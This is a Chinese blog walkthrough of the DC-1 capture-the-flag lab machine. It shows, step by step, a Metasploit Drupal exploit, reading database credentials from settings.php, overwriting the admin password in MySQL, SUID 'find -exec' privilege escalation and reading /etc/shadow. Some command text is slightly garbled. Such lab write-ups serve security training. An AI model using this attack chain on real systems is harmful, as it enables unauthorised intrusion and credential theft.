DC-1靶机

本文描述了通过winefscan进行网络扫描,发现Drupal网站漏洞,利用Metasploit进行渗透攻击,包括设置参数、提权和获取flag的过程。最后实现对MySQL数据库的访问和root权限提升。
摘要由CSDN通过智能技术生成

扫描存活机器和服务

wine fscan.64 -h 192.168.56.0/24

确定靶机IP为:192.168.56.101

在这里插入图片描述

扫描端口

wine fscan.64 -h192.168.56.101 -p 1-65535

发现靶机开启22、80、111、44329端口
在这里插入图片描述

进入网站界面

在这里插入图片描述

添加火狐插件wappalyzer

版本系统:Drupal

在这里插入图片描述

在火狐自带的网站中搜索drupal漏洞信息

在这里插入图片描述
在这里插入图片描述

6.–渗透攻击

打开利用工具集msf

在这里插入图片描述

在这里插入图片描述

查找漏洞信息

search drupal

在这里插入图片描述

选择漏洞编号

use 1

在这里插入图片描述

查看需要设置的选项

上半部分是靶机需要设置的选项,下半部分是本机需要设置的选项

show options

在这里插入图片描述

设置参数

set rhost 192.168.56.101(靶机IP)

set lhost 192.168.56.103(本地IP)

在这里插入图片描述

启动渗透攻击(exploit)

exploit

在这里插入图片描述

进入shell

在这里插入图片描述

获取交互shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

在这里插入图片描述

ls

找到flag1

cat flag1.txt

在这里插入图片描述

进入站点目录sites 并ls一下

进入默认目录default并 ls一下

查看配置文件settings.php

在这里插入图片描述

找到flag2

发现一个数据库 用户名是:dbuser 密码是:R0ck3t 尝试连接一下

mysql -udbuser -pR0ck3t

在这里插入图片描述

查看一下所有的数据库,发现一个drupaldb数据库

看一眼drupaldb数据库里有什么?

show databases;

use drupaldb;

show tables;

发现有一个users表,进去瞅一眼

select * from users\G;

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

发现密码进行了加密

去找密码

cd scripts/

发现hash密码加密的脚本

在这里插入图片描述

在这里插入图片描述

运行脚本

./password -hash.sh “123456”

S S SD0NRUahiGqy7BHW1KKFRFL8tEdk6x/5R8X6olTCbOhJyMY6F5K/c

在这里插入图片描述

如果发现报错

使用命令cp -r …/includes ./复制整个includes目录至scripts目录,再次执行。

更新admin的密码

use drupaldb;

update users set pass=' S S SD0NRUahiGqy7BHW1KKFRFL8tEdk6x/5R8X6olTCbOhJyMY6F5K/c

’ where name=‘admin’;

在这里插入图片描述

进入浏览器,访问网站

然后通过修改的密码进行登录

admin:123456

在这里插入图片描述

进入网站之后查看内容,发现flag3

在这里插入图片描述

在这里插入图片描述

23.–进行find提权

flag3指出:特殊权限是需要用到 find和-exec 命令,也提到了shadow。就是说提权的话,需要用到以上两个命令,以及shadow文件。我们尝试查看shadow文件,提示权限不够

cat /etc/shadow 查看shadow文件

权限不够,不能查看

在这里插入图片描述

find提权:(suid)

find -name mysql -exec /bin/sh ;

	-name:按文件名进行查找

	-exec:对匹配对象执行命令,以;结束

				但; 是特使字符,所以需要前面加\  进行转义

在这里插入图片描述

提权成功

查看shadow文件

cat /etc/shadow

找到flag4

在这里插入图片描述

切换到flag4的家目录

cd ~flag4

ls

cat flag4.txt

进入root家目录

cd ~

ls

cat thefinalflag.txt

在这里插入图片描述

OK!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值